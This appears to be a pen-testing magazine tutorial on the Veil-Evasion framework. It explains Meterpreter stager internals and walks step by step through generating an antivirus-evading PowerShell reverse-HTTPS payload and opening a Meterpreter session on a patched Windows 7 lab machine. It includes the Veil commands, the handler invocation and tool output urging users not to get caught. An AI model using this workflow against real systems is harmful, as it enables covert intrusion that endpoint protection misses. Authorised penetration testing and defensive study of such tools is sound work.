Veil [1] is a penetration-testing framework that was originally designed to evade antivirus protection on the target system. Since its first release three years ago, Veil has expanded to include other payload delivery options, and it even comes with some post-exploitation capabilities. The original Veil release only supported three payload shellcode injection options. New versions can incorporate the complete Metasploit Windows payload system [2].

Veil is capable of bypassing antivirus solutions deployed on endpoints during a pen-testing session. To bypass antivirus protection, Veil generates random and unique payloads for exploits. This ability to make random changes to the payload is similar to polymorphic malware that changes as it moves from host to host, making it much more difficult to discover than traditional malware, which has a distinct signature. Veil's exploits are compatible with popular penetration testing tool frameworks like Metasploit, which makes it very easy to incorporate Metasploit into your existing penetration testing routine. Veil aggregates various shellcode injection techniques across multiple languages, putting the focus on automation and usability.

Veil-Evasion Features

The original purpose of Veil was to evade antivirus protection by morphing the attack in random ways that would not turn up on an anitvirus signature. As the project began to evolve and take on additional capabilities, the original antivirus-evading component was renamed Veil-Evasion.

Veil-Evasion can use custom or Metasploit-generated shellcode, and you can easily integrate third-party tools, such as Hyperion, PEScrambler, and BackDoor Factory.

Native Stagers

Stagers manage an attack on the target system as follows [3]:

1. Establish a socket connection to the Metasploit handler (this will happen as the stage 1 victim executes the payload and a TCP session is created, connecting back to the listener.

2. Read a 4-byte length, indicating the .dll size and then transfer the .dll.

3. Allocate a (length-byte+5) buffer; mark it as writable and executable.

4. At buffer[ ], write some assembly code that stores the current socket ID of the connection in the EDI register.

5. At buffer[1:4], store the int value of the current socket ID.

6. Read length bytes from the connection from the pipe into buffer[5...] (this is the meterpreter .dll).

7. Invoke a call to the shellcode blob with the VirtualAlloc() pattern or void pointer casting.

8. The meterpreter .dll now uses the already-established socket for communication, avoiding an additional connect back.

See the box titled "Veil-Ready Stagers" for a list of possible options for pen-testing with Veil.

Getting to Work

If you use the Kali Linux pen-testing distro, you will find Veil in the Kali repositories. Veil is also available for Debian systems through the Veil GitHub. To install:

# apt-cache search veil
# apt-get install

Use the Veil GitHub repositories [4] if you want to be sure you're installing the latest version. Copy the clone URL, then paste it in the command:

# git clone https://github.com/veil-evasion/Veil.git

Next, run the setup.sh script in the Veil/setup directory.

You'll be presented with the Python setup (install for all users). When you are presented with the Python Win32 script, click Next . Then, click Next for pycrypto.

To start Veil, go the directory you installed to, which was /opt/Veil/Veil-Evasion on my system and enter the command:

./Veil-Evasion.py

Start by firing up Veil-Evasion (Figure 1),

./Veil-Evasion

then enter the command

use python/mmeterpreter/rev_https/

Figure 1: Veil launches to a text-based command prompt.

Or, you can just give the number of the payload, which is 21. You are then presented with some available options and commands associated with powershell/meterpreter/rev_https (see Figure 2).

Figure 2: Loading the rev_https payload.

Listing 1 shows an interactive session with commands that create two files in the veil-output directory. The first one in /root/veil-output/source/payload21.bat is the executable that will be loaded on the Windows box and run. The second file, /root/veil-output/handlers/payload21_handler.rc, is the one I call up on the Kali box.

[powershell/meterpreter/rev_https>>]: set LHOST 192.168.0.19 [I] LHOST =>
192.168.0.19 [powershell/meterpreter/rev_https>>]: generate
Veil-Evasion | [Version]: 2.22.1
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
[>] Please enter the base name for output files (default is 'payload'): payload21
Language:            powershell
Payload:             powershell/meterpreter/rev_https Required Options:      LHOST=192.168.0.19  LPORT=8443  PROXY=N
Payload File:        /root/veil-output/source/payload21.bat Handler File:    /root/veil-output/handlers/payload21_handler.rc
[*] Your payload files have been generated, don't get caught! [!] And don't submit samples to any online scanner! ;)
[>] Press any key to return to the main menu.

I'll run the payload21_handler.rc file using Metasploit's msfconsole command prompt on the Kali system:

msfconsole -r /root/veil-output/handlers/payload21_handler.rc

See the output in Figure 3. The payload21_handler.rc file causes the payload21.bat file to execute on the Windows box, so you now have a shell to interact with (Figure 4).

Figure 3: payload21_handler.rc output.

Figure 4: Starting the HTTPS reverse handler.

Meterpreter session 1 opened between 192.168.0.19 and 192.168.0.201, and the Windows box has up-to-date Webroot and Malwarebytes applications, which did not catch the attack.

Figure 5 show that the Windows box is a fully patched Windows 7 operating system with Webroot and Malwarebytes. Neither Webroot not Malwarebytes caught the attack.

Figure 5: The Windows system has no clue it has just been attacked.